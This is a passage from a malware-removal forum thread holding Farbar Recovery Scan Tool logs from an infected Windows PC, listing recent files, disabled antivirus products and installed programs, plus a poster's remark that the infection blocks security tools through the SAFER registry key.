- 2014-08-23 16:48 - 00000000 ____D () C:\ProgramData\HitmanPro2014-08-22 13:41 - 2014-08-22 13:54 - 00000000 ____D () C:\Windows\dwrcs2014-08-22 13:41 - 2014-08-22 13:41 - 00000000 ____D () C:\ProgramData\DameWare Development2014-08-22 13:25 - 2014-08-23 11:16 - 00000782 _____ () C:\Windows\setupact.log2014-08-22 13:25 - 2014-08-22 13:25 - 00000000 _____ () C:\Windows\setuperr.log2014-08-20 19:17 - 2014-08-20 19:17 - 00319456 _____ (Microsoft Corporation) C:\Windows\DIFxAPI.dll2014-08-20 18:46 - 2014-08-20 18:46 - 00000666 _____ () C:\Toolbars.dat2014-08-20 18:12 - 2014-08-19 18:12 - 00075264 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys2014-08-20 18:08 - 2014-08-20 18:08 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy2014-08-19 23:07 - 2014-08-19 23:07 - 00000000 ____D () C:\ProgramData\GlarySoft2014-08-17 16:29 - 2014-08-17 16:29 - 04763288 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4745.exe2014-08-17 15:54 - 2014-08-17 15:54 - 04462440 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4335_welcomecmp.exe2014-08-16 17:57 - 2014-08-17 17:23 - 00000000 ____D () C:\ProgramData\AVG20142014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\MFAData2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Avg20142014-08-16 17:04 - 2014-08-16 17:05 - 04755832 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_free_stb_all_2014_4744_cnet.exe2014-08-16 12:05 - 2014-08-16 12:05 - 00000000 ____D () C:\ProgramData\SlimWare Utilities Inc2014-08-16 12:04 - 2014-08-16 12:04 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Downloaded Installers2014-08-15 20:57 - 2014-08-16 12:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\SlimWare Utilities Inc2014-08-15 20:56 - 2014-08-16 09:22 - 00000000 ____D () C:\Program Files\DriverUpdate2014-08-15 20:56 - 2014-08-15 20:56 - 00000000 ____D () C:\Users\Public\Documents\Downloaded Installers2014-08-15 13:32 - 2014-08-15 13:32 - 06534584 _____ (Systweak Software ) C:\Users\savas.kyriakidis\Downloads\PCDiagnosisProTPSSetup.exe2014-08-15 13:23 - 2014-08-15 13:23 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (3).exe2014-08-15 13:12 - 2014-08-15 13:13 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (2).exe2014-08-15 13:11 - 2014-08-15 13:11 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (1).exe2014-08-15 13:04 - 2014-08-15 13:21 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\TeamViewer2014-08-15 13:02 - 2014-08-15 13:02 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en.exe2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803173445318587.exe2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803172000784607.exe2014-08-15 11:12 - 2014-08-15 11:13 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012 (1).exe2014-08-15 11:11 - 2014-08-15 11:12 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012.exe2014-08-14 19:24 - 2014-08-14 19:24 - 00000000 ___HD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup-Disabled2014-08-14 18:20 - 2014-08-23 16:22 - 00000342 _____ () C:\Windows\Tasks\GlaryInitialize 5.job2014-08-14 18:20 - 2014-08-20 23:44 - 00000891 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5.lnk2014-08-14 18:20 - 2014-08-20 23:44 - 00000879 _____ () C:\Users\Public\Desktop\Glary Utilities 5.lnk2014-08-14 18:20 - 2014-08-14 18:20 - 00017216 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\GUBootStartup.sys2014-08-14 18:20 - 2014-08-14 18:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 52014-08-14 18:19 - 2014-08-23 11:16 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\DiskDefrag2014-08-14 18:19 - 2014-08-22 13:27 - 00000000 ____D () C:\Program Files\Glary Utilities 52014-08-14 18:19 - 2014-08-14 18:19 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\GlarySoft2014-08-14 18:19 - 2014-08-04 03:06 - 00101664 _____ (Glarysoft Ltd) C:\Windows\system32\BootDefrag.exe2014-08-14 18:19 - 2014-07-18 03:11 - 00016064 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\BootDefragDriver.sys2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (5).exe2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (4).exe2014-08-14 18:15 - 2014-08-14 18:16 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (3).exe2014-08-14 18:15 - 2014-08-14 18:15 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (2).exe2014-08-14 18:14 - 2014-08-14 18:14 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (1).exe2014-08-14 18:13 - 2014-08-14 18:13 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup.exe2014-08-14 17:37 - 2014-08-14 17:40 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809374825884190.exe2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809372042763201.exe2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809371092783465.exe2014-08-13 21:31 - 2014-08-13 21:31 - 00001666 _____ () C:\Users\Public\Desktop\iTunes.lnk2014-08-13 21:31 - 2014-08-13 21:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes2014-08-13 21:28 - 2014-08-13 21:31 - 00000000 ____D () C:\ProgramData\188F1432-103A-4ffb-80F1-36B633C5C9E12014-08-13 21:28 - 2014-08-13 21:28 - 00000000 ____D () C:\Program Files\iPod2014-08-13 20:51 - 2014-08-13 20:52 - 00000000 ____D () C:\Program Files\QuickTime2014-08-13 20:51 - 2014-08-13 20:51 - 00001728 _____ () C:\Users\Public\Desktop\QuickTime Player.lnk2014-08-13 20:51 - 2014-08-13 20:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime2014-08-12 21:20 - 2014-08-12 21:20 - 00000000 ____D () C:\ProgramData\WindowsSearch2014-08-12 18:03 - 2014-08-12 18:03 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\42a4952014-08-12 18:02 - 2014-08-22 16:10 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\42a4952014-08-12 17:58 - 2014-08-15 03:47 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\browser_dir2014-08-12 16:53 - 2014-08-22 21:40 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\Puorfu2014-08-12 16:51 - 2014-08-12 16:51 - 00000000 ____D () C:\ProgramData\IrfuqApivh ==================== One Month Modified Files and Folders ======= (If an entry is included in the fixlist, the file\folder will be moved.) 2014-08-23 16:54 - 2014-08-23 16:54 - 00000000 ____D () C:\FRST2014-08-23 16:54 - 2014-07-18 00:39 - 01159804 _____ () C:\Windows\WindowsUpdate.log2014-08-23 16:48 - 2014-08-22 14:00 - 00000000 ____D () C:\ProgramData\HitmanPro2014-08-23 16:30 - 2014-08-23 16:30 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys2014-08-23 16:30 - 2014-08-23 16:30 - 00000901 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk2014-08-23 16:30 - 2014-08-23 16:30 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware2014-08-23 16:30 - 2014-08-23 16:30 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware2014-08-23 16:30 - 2011-03-14 18:46 - 00000000 ____D () C:\ProgramData\Malwarebytes2014-08-23 16:27 - 2006-11-02 06:33 - 00694332 _____ () C:\Windows\system32\PerfStringBackup.INI2014-08-23 16:22 - 2014-08-14 18:20 - 00000342 _____ () C:\Windows\Tasks\GlaryInitialize 5.job2014-08-23 16:21 - 2008-08-06 12:35 - 00000276 _____ () C:\Windows\Tasks\RtlNICDiagVistaStart.job2014-08-23 16:21 - 2006-11-02 09:01 - 00000006 ____H () C:\Windows\Tasks\SA.DAT2014-08-23 16:21 - 2006-11-02 08:47 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A02014-08-23 16:21 - 2006-11-02 08:47 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A02014-08-23 16:20 - 2014-08-22 16:12 - 00038790 _____ () C:\Windows\PFRO.log2014-08-23 16:16 - 2014-08-23 16:16 - 00009460 _____ () C:\ComboFix.txt2014-08-23 16:16 - 2014-08-22 15:52 - 00000000 ____D () C:\Qoobox2014-08-23 16:13 - 2006-11-02 06:23 - 00000215 _____ () C:\Windows\system.ini2014-08-23 14:48 - 2006-11-02 09:01 - 00032640 _____ () C:\Windows\Tasks\SCHEDLGU.TXT2014-08-23 14:45 - 2006-11-02 07:18 - 00000000 ____D () C:\Windows\schemas2014-08-23 14:32 - 2011-03-14 18:43 - 00000000 ____D () C:\Windows\pss2014-08-23 14:22 - 2006-11-02 07:18 - 00000000 ___RD () C:\Users\Public2014-08-23 14:20 - 2011-12-29 11:34 - 00000000 ____D () C:\Windows\ERDNT2014-08-23 14:09 - 2011-03-06 00:06 - 00000000 ____D () C:\Users\savas.kyriakidis2014-08-23 14:09 - 2011-02-10 21:08 - 00000000 ____D () C:\Users\Rita2014-08-23 12:12 - 2014-08-23 12:12 - 00007836 _____ () C:\Users\savas.kyriakidis\Desktop\reg.txt2014-08-23 12:03 - 2014-08-23 12:03 - 00009362 _____ () C:\Users\savas.kyriakidis\Desktop\safer.txt2014-08-23 11:53 - 2014-08-23 11:51 - 00000000 ____D () C:\AdwCleaner2014-08-23 11:49 - 2014-08-23 11:49 - 00007919 _____ () C:\Users\savas.kyriakidis\Desktop\JRT.txt2014-08-23 11:42 - 2014-08-23 11:42 - 00000000 ____D () C:\Windows\ERUNT2014-08-23 11:25 - 2014-08-23 11:23 - 00001106 _____ () C:\Users\savas.kyriakidis\Desktop\Live PC Help.lnk2014-08-23 11:16 - 2014-08-22 13:25 - 00000782 _____ () C:\Windows\setupact.log2014-08-23 11:16 - 2014-08-14 18:19 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\DiskDefrag2014-08-23 11:05 - 2014-08-23 11:02 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy2014-08-22 21:40 - 2014-08-22 17:05 - 00000000 ____D () C:\VIPRERESCUE2014-08-22 21:40 - 2014-08-12 16:53 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\Puorfu2014-08-22 17:13 - 2012-05-16 21:52 - 00000000 ____D () C:\temp2014-08-22 17:05 - 2014-08-22 17:05 - 00000000 ____D () C:\EEK2014-08-22 16:10 - 2014-08-12 18:02 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\42a4952014-08-22 15:42 - 2014-08-22 14:32 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy.BackupBySpybotPortable2014-08-22 14:32 - 2014-08-22 14:32 - 00000000 ____D () C:\Users\savas.kyriakidis\Documents\ProcAlyzer Dumps2014-08-22 14:15 - 2011-12-22 20:05 - 00000000 ____D () C:\ProgramData\AVAST Software2014-08-22 13:54 - 2014-08-22 13:41 - 00000000 ____D () C:\Windows\dwrcs2014-08-22 13:41 - 2014-08-22 13:41 - 00000000 ____D () C:\ProgramData\DameWare Development2014-08-22 13:27 - 2014-08-14 18:19 - 00000000 ____D () C:\Program Files\Glary Utilities 52014-08-22 13:25 - 2014-08-22 13:25 - 00000000 _____ () C:\Windows\setuperr.log2014-08-21 22:25 - 2011-12-22 18:52 - 00000680 _____ () C:\Users\savas.kyriakidis\AppData\Local\d3d9caps.dat2014-08-21 00:06 - 2011-03-06 00:06 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Google2014-08-20 23:44 - 2014-08-14 18:20 - 00000891 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5.lnk2014-08-20 23:44 - 2014-08-14 18:20 - 00000879 _____ () C:\Users\Public\Desktop\Glary Utilities 5.lnk2014-08-20 23:39 - 2008-08-06 12:41 - 00000000 ____D () C:\Program Files\Google2014-08-20 20:00 - 2009-06-10 23:44 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lexmark Z700-P700 Series2014-08-20 19:17 - 2014-08-20 19:17 - 00319456 _____ (Microsoft Corporation) C:\Windows\DIFxAPI.dll2014-08-20 18:46 - 2014-08-20 18:46 - 00000666 _____ () C:\Toolbars.dat2014-08-20 18:08 - 2014-08-20 18:08 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy2014-08-19 23:07 - 2014-08-19 23:07 - 00000000 ____D () C:\ProgramData\GlarySoft2014-08-19 18:12 - 2014-08-20 18:12 - 00075264 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys2014-08-17 17:23 - 2014-08-16 17:57 - 00000000 ____D () C:\ProgramData\AVG20142014-08-17 17:23 - 2011-07-10 20:09 - 00000000 ____D () C:\$AVG2014-08-17 16:31 - 2011-07-10 19:21 - 00000000 ____D () C:\ProgramData\MFAData2014-08-17 16:29 - 2014-08-17 16:29 - 04763288 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4745.exe2014-08-17 15:54 - 2014-08-17 15:54 - 04462440 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4335_welcomecmp.exe2014-08-16 18:01 - 2011-07-10 19:25 - 00000000 ____D () C:\Program Files\AVG2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\MFAData2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Avg20142014-08-16 17:05 - 2014-08-16 17:04 - 04755832 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_free_stb_all_2014_4744_cnet.exe2014-08-16 12:05 - 2014-08-16 12:05 - 00000000 ____D () C:\ProgramData\SlimWare Utilities Inc2014-08-16 12:05 - 2014-08-15 20:57 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\SlimWare Utilities Inc2014-08-16 12:04 - 2014-08-16 12:04 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Downloaded Installers2014-08-16 10:06 - 2012-10-02 18:32 - 00000000 ____D () C:\Program Files\HTC2014-08-16 09:27 - 2008-08-06 12:49 - 00000000 ____D () C:\Program Files\Citrix2014-08-16 09:22 - 2014-08-15 20:56 - 00000000 ____D () C:\Program Files\DriverUpdate2014-08-15 20:56 - 2014-08-15 20:56 - 00000000 ____D () C:\Users\Public\Documents\Downloaded Installers2014-08-15 20:41 - 2012-10-02 18:45 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Htc2014-08-15 19:55 - 2008-08-06 12:37 - 00000000 ____D () C:\Program Files\Microsoft Office2014-08-15 19:54 - 2006-11-02 07:18 - 00000000 ____D () C:\Windows\system2014-08-15 17:56 - 2006-11-02 08:47 - 00267048 _____ () C:\Windows\system32\FNTCACHE.DAT2014-08-15 13:32 - 2014-08-15 13:32 - 06534584 _____ (Systweak Software ) C:\Users\savas.kyriakidis\Downloads\PCDiagnosisProTPSSetup.exe2014-08-15 13:26 - 2011-06-17 17:39 - 00058896 _____ () C:\Windows\system32\GDIPFONTCACHEV1.DAT2014-08-15 13:23 - 2014-08-15 13:23 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (3).exe2014-08-15 13:21 - 2014-08-15 13:04 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\TeamViewer2014-08-15 13:13 - 2014-08-15 13:12 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (2).exe2014-08-15 13:11 - 2014-08-15 13:11 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (1).exe2014-08-15 13:02 - 2014-08-15 13:02 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en.exe2014-08-15 13:01 - 2012-01-24 17:09 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\LogMeIn Rescue Applet2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803173445318587.exe2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803172000784607.exe2014-08-15 11:13 - 2014-08-15 11:12 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012 (1).exe2014-08-15 11:12 - 2014-08-15 11:11 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012.exe2014-08-15 03:47 - 2014-08-12 17:58 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\browser_dir2014-08-14 19:24 - 2014-08-14 19:24 - 00000000 ___HD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup-Disabled2014-08-14 18:20 - 2014-08-14 18:20 - 00017216 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\GUBootStartup.sys2014-08-14 18:20 - 2014-08-14 18:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 52014-08-14 18:19 - 2014-08-14 18:19 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\GlarySoft2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (5).exe2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (4).exe2014-08-14 18:16 - 2014-08-14 18:15 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (3).exe2014-08-14 18:15 - 2014-08-14 18:15 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (2).exe2014-08-14 18:14 - 2014-08-14 18:14 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (1).exe2014-08-14 18:13 - 2014-08-14 18:13 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup.exe2014-08-14 17:40 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809374825884190.exe2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809372042763201.exe2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809371092783465.exe2014-08-13 23:07 - 2013-06-10 19:17 - 00002463 _____ () C:\Users\Public\Desktop\Transporter.lnk2014-08-13 21:31 - 2014-08-13 21:31 - 00001666 _____ () C:\Users\Public\Desktop\iTunes.lnk2014-08-13 21:31 - 2014-08-13 21:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes2014-08-13 21:31 - 2014-08-13 21:28 - 00000000 ____D () C:\ProgramData\188F1432-103A-4ffb-80F1-36B633C5C9E12014-08-13 21:31 - 2011-12-24 11:26 - 00000000 ____D () C:\Program Files\iTunes2014-08-13 21:28 - 2014-08-13 21:28 - 00000000 ____D () C:\Program Files\iPod2014-08-13 21:28 - 2008-09-02 12:28 - 00000000 ____D () C:\Program Files\Common Files\Apple2014-08-13 21:02 - 2008-09-02 12:28 - 00000000 ____D () C:\ProgramData\Apple2014-08-13 20:52 - 2014-08-13 20:51 - 00000000 ____D () C:\Program Files\QuickTime2014-08-13 20:51 - 2014-08-13 20:51 - 00001728 _____ () C:\Users\Public\Desktop\QuickTime Player.lnk2014-08-13 20:51 - 2014-08-13 20:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime2014-08-13 20:41 - 2013-04-22 21:16 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud2014-08-13 20:18 - 2008-08-06 12:41 - 00000000 ____D () C:\ProgramData\Google2014-08-12 21:20 - 2014-08-12 21:20 - 00000000 ____D () C:\ProgramData\WindowsSearch2014-08-12 18:03 - 2014-08-12 18:03 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\42a4952014-08-12 17:13 - 2011-08-28 07:57 - 00000000 ____D () C:\Users\savas.kyriakidis\Desktop\ALL Folders2014-08-12 17:09 - 2011-08-28 08:01 - 00000000 ____D () C:\Users\savas.kyriakidis\Desktop\Desk Top Stuff2014-08-12 16:51 - 2014-08-12 16:51 - 00000000 ____D () C:\ProgramData\IrfuqApivh2014-08-04 03:06 - 2014-08-14 18:19 - 00101664 _____ (Glarysoft Ltd) C:\Windows\system32\BootDefrag.exe ==================== Bamital & volsnap Check ================= (There is no automatic fix for files that do not pass verification.) C:\Windows\explorer.exe => File is digitally signedC:\Windows\system32\winlogon.exe => File is digitally signedC:\Windows\system32\wininit.exe => File is digitally signedC:\Windows\system32\svchost.exe => File is digitally signedC:\Windows\system32\services.exe => File is digitally signedC:\Windows\system32\User32.dll => File is digitally signedC:\Windows\system32\userinit.exe => File is digitally signedC:\Windows\system32\rpcss.dll => File is digitally signedC:\Windows\system32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2014-08-23 16:28 ==================== End Of Log ============================ Link to post Share on other sites More sharing options...
jjoyner1985 Posted August 23, 2014 Author ID:870469 Share Posted August 23, 2014 Forgot to mention that this infection also edits the safer key in the registry to disable the anti-viral programs on the computer. Removing the safer\codeidentifiers\0\path part of the key allows those programs to run until the block is put back in place a few minutes later. Addition.txt Additional scan result of Farbar Recovery Scan Tool (x86) Version:23-08-2014Ran by savas.kyriakidis at 2014-08-23 16:55:17Running from F:\Boot Mode: Normal========================================================== ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AV: Microsoft Security Essentials (Disabled - Up to date) {108DAC43-C256-20B7-BB05-914135DA5160}AV: AVG Internet Security 2011 (Disabled - Up to date) {5A2746B1-DEE9-F85A-FBCD-ADB11639C5F0}AS: AVG Internet Security 2011 (Disabled - Up to date) {E146A755-F8D3-F7D4-C17D-96C36DBE8F4D}AS: Microsoft Security Essentials (Disabled - Up to date) {ABEC4DA7-E46C-2F39-81B5-AA334E5D1BDD}AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}FW: AVG Firewall (Disabled) {621CC794-9486-F902-D092-0484E8EA828B} ==================== Installed Programs ====================== (Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) Update for Microsoft Office 2007 (KB2508958) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{0C5823AA-7B6F-44E1-8D5B-8FD1FF0E6438}) (Version: - Microsoft)32 Bit HP CIO Components Installer (Version: 3.1.1 - Hewlett-Packard) Hidden6500_E709_eDocs (Version: 1.00.0000 - Hewlett-Packard) Hidden6500_E709_Help (Version: 1.00.0000 - Hewlett-Packard) Hidden6500_E709a (Version: 50.0.165.000 - Hewlett-Packard) HiddenAcrobat.com (HKLM\...\com.adobe.mauby.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 2.0.0.0 - Adobe Systems Incorporated)Acrobat.com (Version: 2.0.0 - Adobe Systems Incorporated) HiddenActivClient CAC x86 (HKLM\...\{1BE8806A-84F8-4655-A381-0D5524430944}) (Version: 6.2 - ActivIdentity)Adobe AIR (HKLM\...\Adobe AIR) (Version: 3.2.0.2070 - Adobe Systems Incorporated)Adobe AIR (Version: 3.2.0.2070 - Adobe Systems Incorporated) HiddenAdobe Flash Player 11 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 11.0.1.152 - Adobe Systems Incorporated)Adobe Reader X (10.1.2) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.2 - Adobe Systems Incorporated)Akamai NetSession Interface (HKCU\...\Akamai) (Version: - Akamai Technologies, Inc)Any Video Converter 3.0.1 (HKLM\...\Any Video Converter_is1) (Version: - Any-Video-Converter.com)Apple Application Support (HKLM\...\{78002155-F025-4070-85B3-7C0453561701}) (Version: 3.0.6 - Apple Inc.)Apple Mobile Device Support (HKLM\...\{941B4CE7-3F5D-443E-A8B7-56A420D2EAFD}) (Version: 7.1.2.6 - Apple Inc.)Apple Software Update (HKLM\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)ATI Catalyst Control Center (HKLM\...\{055EE59D-217B-43A7-ABFF-507B966405D8}) (Version: 2.007.0731.2233 - )AVG 2011 (HKLM\...\AVG) (Version: 10.0.1416 - AVG Technologies)AVG 2011 (Version: 10.0.1388 - AVG Technologies) HiddenAVG 2011 (Version: 10.0.1390 - AVG Technologies) HiddenAVG 2011 (Version: 10.0.1391 - AVG Technologies) HiddenAVG 2011 (Version: 10.0.1392 - AVG Technologies) HiddenAVG 2011 (Version: 10.0.1410 - AVG Technologies) HiddenAVG 2011 (Version: 10.0.1416 - AVG Technologies) HiddenAVG 2011 (Version: 10.0.2109 - AVG Technologies) HiddenBonjour (HKLM\...\{79155F2B-9895-49D7-8612-D92580E0DE5B}) (Version: 3.0.0.10 - Apple Inc.)bpd_scan (Version: 3.00.0000 - Hewlett-Packard) HiddenBPDSoftware (Version: 50.0.165.000 - Hewlett-Packard) HiddenBPDSoftware_Ini (Version: 1.00.0000 - Hewlett-Packard) HiddenBrowser Address Error Redirector (HKLM\...\{62230596-37E5-4618-A329-0D21F529A86F}) (Version: 1.00.0000 - Dell)BufferChm (Version: 120.0.194.000 - Hewlett-Packard) HiddenCatalyst Control Center Core Implementation (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Graphics Full Existing (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Graphics Full New (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Graphics Light (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Graphics Previews Common (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Graphics Previews Vista (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Chinese Standard (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Chinese Traditional (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization French (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization German (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Hungarian (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Italian (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Japanese (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Korean (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Polish (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Portuguese (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Spanish (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Thai (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Turkish (Version: 2007.0731.2234.38497 - ATI) HiddenCCC Help Chinese Standard (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help Chinese Traditional (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help English (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help French (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help German (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help Hungarian (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help Italian (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help 